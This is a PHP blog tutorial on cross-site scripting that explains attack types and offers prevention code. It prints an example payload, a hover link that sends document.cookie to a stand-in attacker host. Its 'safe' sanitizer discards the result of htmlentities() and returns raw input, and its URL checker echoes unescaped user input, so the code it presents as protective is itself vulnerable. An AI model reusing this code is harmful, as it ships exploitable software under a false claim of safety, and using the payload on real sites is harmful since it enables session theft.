packetcode logo
Preventing XSS attack in PHP

Preventing XSS attack in PHP

17915 views 2 years ago Tutorials PHP

Sometimes we see webpages popup unnecessary alerts, unexpected form submissions and even a huge stack of fake links to untrusted websites. Probably the website is attacked using cross site scripting also known as xss attack. This tutorial is focused on what is this attack, what it can do and how to prevent it.

What it is?

Cross-site scripting attacks typically involve more than one website (which makes them cross-site), and they involve some sort of scripting. It attempts to insert malicious markup or JavaScript code into values that are subsequently displayed in a web page. This malicious code attempts to take advantage of a user’s trust in a website, by tricking him (or his browser) into performing some action or submitting some information to another, untrusted site.

The malicious code inserted into an application is very much destructive, it can do almost anything: take remote control of the client browser, reveal the value of a cookie, change links on the page (indeed, modify any part of the DOM), redirect to another URI, or render a bogus form that collects and forwards information to an attacker, or initiate some other undesirable action. The very variety of possible exploits is what makes them so hard to pin down in definition, and to guard against.

Type of attack

Remote Site to Application Site

This type of attack is launched externally, from either an email message or another website. The user is tricked into clicking a link, loading an image, or submitting a form in which a malicious payload is secreted; that payload then accomplishes something undesirable in the application. This usually requires that the user possess an active session on the application site (otherwise, there is no point to the attack). However, depending on the nature of the attack and the application’s login mechanism, the attacking payload might be able to make its way through the login process intact.

An example of such a payload is a URI like the following, where $_GET['subject'] is the subject of a new guestbook post:


<a href='http://guestbook.example.org/addComment.php? subject=I%20am%20owned'>
Check it out!</a>

This sort of attack provides a compelling reason why email clients should not automatically load images from untrusted sites, because an image’s src attribute could cause the email client to automatically send a GET request to a third party.It is also a reason why your applications should relentlessly expire sessions that have been unused for some period of time. A user who has a secure connection open to your application but has gone off multitasking on a chat site represents a significant threat to the security of your application and your data.

Application Site to Same or Remote Site

This type of attack is launched locally, exploiting a user’s trust in your application (which leads her to expect that any links appearing in the application are authentic) to accomplish a nefarious purpose. The attacker embeds a malicious payload into a comment or some other string that is storing user input within the application. When the page with the embedded string is loaded and processed by a user’s browser, some undesirable action is carried out, either on the same site (technically same-site scripting) or by means of a remote URI (cross-site).An example of this is a link like the following:


<a href="#" onmouseover="window.location='http://reallybadguys.net/collectCookie.php?cookie= + 
document.cookie.escape();" > Check it out!</a>

As soon as a user hovers over this link to discover just what it is she should check out, the attacker’s JavaScript is triggered, which redirects the browser to a PHP script that steals her session cookie, which is URL-encoded and passed as $_GET['cookie'].

How to prevent it?

Effective XSS prevention starts when the interface is being designed, not in the final testing stage.

For example, applications that rely on form submission (POST requests) are much less vulnerable to attack than those that allow control via URI query strings (GET requests). It is important, then, before writing the first line of interface code, to set out a clear policy as to which actions and variables will be allowed as $_GET values, and which must come from $_POST values.

The main strategy for preventing XSS is, simply, never to allow user input to remain untouched. In this section, we describe five ways to massage or filter user input to ensure (as much as is possible) that it is not capable of creating an XSS exploit.

Encode HTML Entities

As mentioned already, one common method for carrying out an XSS attack involves injecting an HTML element with an src or onload attribute that launches the attacking script. PHP’s htmlentities() function (information is at http://php.net/htmlentities) will translate all characters with HTML entity equivalents as those entities, thus rendering them harmless. Its sibling htmlspecialchars() is more limited, and should not be used.


<?php
					
	function safe( $value ) {
	  htmlentities( $value, ENT_QUOTES, 'utf-8' );
	  // other processing
	  return $value;					
	}

	// retrieve $title and $message from user input
	$title = $_POST['title'];
	$message = $_POST['message'];

	// and display them safely
	print '<h1>' . safe( $title ) . '</h1>				
		  <p>' . safe( $message ) . '</p>';


?>

This fragment is remarkably straightforward. After retrieving the user’s input, you pass it to the safe() function, which simply applies PHP’s htmlentities() function to any value carried into it. This absolutely prevents HTML from being embedded, and therefore prevents JavaScript embedding as well. You then display the resulting safe versions of the input.

The htmlentities() function also converts both double and single quotation marks to entities, which will ensure safe handling for both of the following possible form elements:


<input type="text" name="myval" value="<?= safe( $myval ) ?>" />
<input type='text' name='yourval' value='<?= safe( $yourval ) ?>' />

The second input (with single quotation marks) is perfectly legal (although possibly slightly unusual) markup, and if $yourval has an unescaped apostrophe or single quotation mark left in it after encoding, the input field can be broken and markup inserted into the page.

Therefore, the ENT_QUOTES parameter should always be used with htmlentities(). It is this parameter that tells htmlentities() to convert a single quotation mark to its entity and a double quotation mark to its entity . While most browsers will render this, some older clients might not, which is why htmlentities() offers a choice of quotation mark translation schemes. The ENT_QUOTES setting is more conservative and therefore more flexible than either ENT_COMPAT or ENT_NOQUOTES, which is why we recommend it.

Url Sanitization

If you allow users to specify a URI (for example, to specify a personal icon or avatar, or to create image- based links as in a directory or catalog), you must ensure that they cannot use URIs contaminated with javascript: or vbscript: specifications. PHP’s parse_url() function (information is at http://php.net/parse_url) will split a URI into an associative array of parts. This makes it easy to check what the scheme key points to (something allowable like http: or ftp:, or something impermissible like javascript:).

The parse_url() function also helpfully contains a query key, which points to an appended query string (that is, a $_GET variable or series of them) if one exists. It thus becomes easy to disallow query strings on URIs. There may, however, be some instances in which stripping off the query portion of a URL will frustrate your users, as when they want to refer to a site with a URI like


http://example.com/pages.asp?pageId=23 & lang=fr.

You might then wish to allow query portions on URIs for explicitly trusted sites, so that a user could legitimately enter the preceding URI for example.com but is not allowed to enter http://bank.example.com/transfer/?amount=1000. A further protection for user-submitted links is to write the domain name of the link in plaintext next to the link itself, Slashdot style:


Hey, go to <a href="http://reallybadguys.net/trap.php">photos.com</a> 
[reallybadguys.net] to see my passport photo!

The theory behind this defense is that the typical user would think twice before following the link to an unknown or untrusted site, especially one with a sinister name. Slashdot switched to this system after users made a sport out of tricking unsuspecting readers into visiting a large photo of a man engaged in an activity that we choose not to describe here, located at http://goatse.cx (the entire incident is described in detail at http://en.wikipedia.org/wiki/Slashdot_trolling_phenomena and http://en.wikipedia.org/wiki/Goatse.cx). Most Slashdot readers learned quickly to avoid links marked [goatse.cx], no matter how enticing the link text was.


<?php
       

    $trustedHosts = array(
    'example.com',
    'another.example.com'
    );
                
 	$trustedHostsCount = count( $trustedHosts );

                    
    function safeURI( $value ) {
    // accesing global variables	
    global $trustedHosts, $trustedHostsCount;
    // parsing the url
      $uriParts = parse_url( $value );
      //check if the host is trusted
      for ( $i = 0; $i < $trustedHostsCount; $i++ ) {
       	if ( $uriParts['host'] === $trustedHosts[$i] ) 
        {
          return $value. '[trusted host]';
        } 
      }				
     return $value.' [untrusted host]';
    }
        

    // retrieve 'uri' from user input
    $uri = $_REQUEST['uri'];

    // and display it safely
    echo safeURI( $uri );
            
?> 

This code fragment is again very straightforward. You create an array of the hosts that are trusted, and a function that compares the host part of the user-submitted URI (obtained with the parse_url() function) to the items in the trusted host array. If you find a match, you return the URI with suffix 'trusted host'. If you don’t find a match, you append the host portion of the URI with 'untrusted host' string, and return that for display. In this case, you have provided the user with an opportunity to see the actual host with a suffix string (trusted/untrusted), and thus to make a reasoned decision about whether to click the link.

Wrap Up

So in this tutorial we have covered what is xss attack, how dangerous it is and how to prevent it. Its important to note that apart from the above mentioned methods of preventions, a general standard code practices has to be involved in designing and developing the code to secure the code from hackers.

im krishna Teja, im a computer science engineer by qualification, a physics teacher by profession and a programmer by interest. I'm an expert in building visually stunning web apps using javascript, ...